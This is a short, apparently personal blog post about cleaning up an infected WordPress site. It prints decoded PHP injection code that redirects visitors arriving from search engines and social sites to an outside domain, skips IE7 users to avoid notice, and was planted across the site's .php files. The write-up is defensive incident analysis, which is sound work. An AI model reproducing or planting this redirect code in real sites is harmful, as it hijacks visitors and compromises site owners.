After finishing all the basic patches, I just notice the 'empty' index.php file is not empty. Open up the index.php file and found this:
This is definitely not good. Lets decode the base64 encoded eval() part and see what we got.
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://minkof.sellclassics.com/");
exit();
}}}}}
The decoded code above shows that any matched URL from referer will be notify the 'minkof.sellclassics.com' via referer. The script has been set not to run on IE7. The suspicious file that doing this infection is coming from the Wordpress plugins script which is from '/wp-admin/plugins.php'. Let's take a look.
Well, just what I expected. There is an infection script on the beginning of file and if we take a look at the bottom file there is a huge base64 encoded string with eval(). After decoding a while seems like all the encoded script are the same and randomly put the code within the plugins.php. This cause the plugins.php generate many error.
Since the infection has been affected on all .php files with the same scripts, I decided to replace all Wordpress file with the new one. After that, there is still left some infected script especially on their custom theme. Need a special script to crawl and find all the infected file. Thanks to @Xanda.org for writing a nice PHP script to detect PHP web shell which is also can be use in this case. After run the script found more than 100 PHP file still got infected. Remove some unused plugins and themes and some have to fix it manually.
The domain name 'minkof.sellclassics.com' seem already down. I can't go further analysis but there is other guys already analyzed what was happened. As I noticed that is is not only affected on Wordpress but also other popular CMS like Joomla, Drupan and so on.
http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html
http://productforums.google.com/forum/#!topic/webmasters/SuUGJWwbqeA
